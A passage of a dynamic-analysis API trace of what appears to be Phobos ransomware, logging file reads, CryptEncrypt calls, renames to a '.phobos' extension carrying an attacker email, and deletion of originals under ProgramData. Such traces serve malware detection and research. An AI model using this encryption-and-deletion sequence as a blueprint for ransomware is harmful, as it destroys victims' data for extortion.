(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.732] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=14134) returned 1 [0175.732] CloseHandle (hObject=0x14c) returned 1 [0175.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms")) returned 0x20 [0175.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.732] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0175.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.732] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=110457) returned 1 [0175.733] CloseHandle (hObject=0x14c) returned 1 [0175.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms")) returned 0x20 [0175.733] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.733] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\programdata\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.733] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0175.733] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-ntkl.etl" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-ntkl.etl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.734] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2818048) returned 1 [0175.734] CloseHandle (hObject=0x14c) returned 1 [0175.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-ntkl.etl" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-ntkl.etl")) returned 0x2020 [0175.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-ntkl.etl" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-ntkl.etl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-ntkl.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-ntkl.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0175.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-ntkl.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-ntkl.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.736] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0175.736] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0175.736] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0175.841] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xe5555, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0175.841] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0176.022] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x270000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0176.022] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0176.191] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ba8) returned 1 [0176.191] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.191] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0176.199] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.199] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0176.199] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0176.235] SetEndOfFile (hFile=0x14c) returned 1 [0176.236] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x270000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0176.236] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0176.238] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xe5555, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0176.238] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0176.244] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0176.244] WriteFile (in: hFile=0x14c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0176.245] CloseHandle (hObject=0x14c) returned 1 [0176.246] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.253] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.253] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=112353) returned 1 [0176.253] CloseHandle (hObject=0x14c) returned 1 [0176.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma")) returned 0x20 [0176.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.254] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.254] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.254] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.254] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.254] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.254] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1b6e1, lpOverlapped=0x0) returned 1 [0176.288] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b6f0, dwBufLen=0x1b6f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b6f0) returned 1 [0176.289] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1b6f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1b6f0, lpOverlapped=0x0) returned 1 [0176.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.291] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.291] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0176.291] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.291] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0176.291] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.291] CloseHandle (hObject=0x14c) returned 1 [0176.291] CloseHandle (hObject=0x188) returned 1 [0176.291] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 05.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 05.wma")) returned 1 [0176.293] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.293] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.294] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=94457) returned 1 [0176.294] CloseHandle (hObject=0x188) returned 1 [0176.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma")) returned 0x20 [0176.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.294] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.294] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.294] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.294] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.294] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.294] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.294] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x170f9, lpOverlapped=0x0) returned 1 [0176.451] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x17100, dwBufLen=0x17100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x17100) returned 1 [0176.452] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x17100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x17100, lpOverlapped=0x0) returned 1 [0176.454] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0176.455] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.455] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0176.455] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.455] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0176.455] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.455] CloseHandle (hObject=0x188) returned 1 [0176.455] CloseHandle (hObject=0x14c) returned 1 [0176.455] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 07.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 07.wma")) returned 1 [0176.457] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.458] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1272) returned 1 [0176.458] CloseHandle (hObject=0x14c) returned 1 [0176.458] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk")) returned 0x20 [0176.458] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.458] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.458] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.458] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.458] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.459] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.459] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.459] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4f8, lpOverlapped=0x0) returned 1 [0176.461] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500, dwBufLen=0x500 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500) returned 1 [0176.461] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x500, lpOverlapped=0x0) returned 1 [0176.462] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0176.462] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.462] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.462] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.462] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.462] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.462] CloseHandle (hObject=0x14c) returned 1 [0176.462] CloseHandle (hObject=0x188) returned 1 [0176.463] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Snipping Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\snipping tool.lnk")) returned 1 [0176.467] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.468] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1330) returned 1 [0176.468] CloseHandle (hObject=0x188) returned 1 [0176.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk")) returned 0x20 [0176.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.468] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.468] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.469] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound 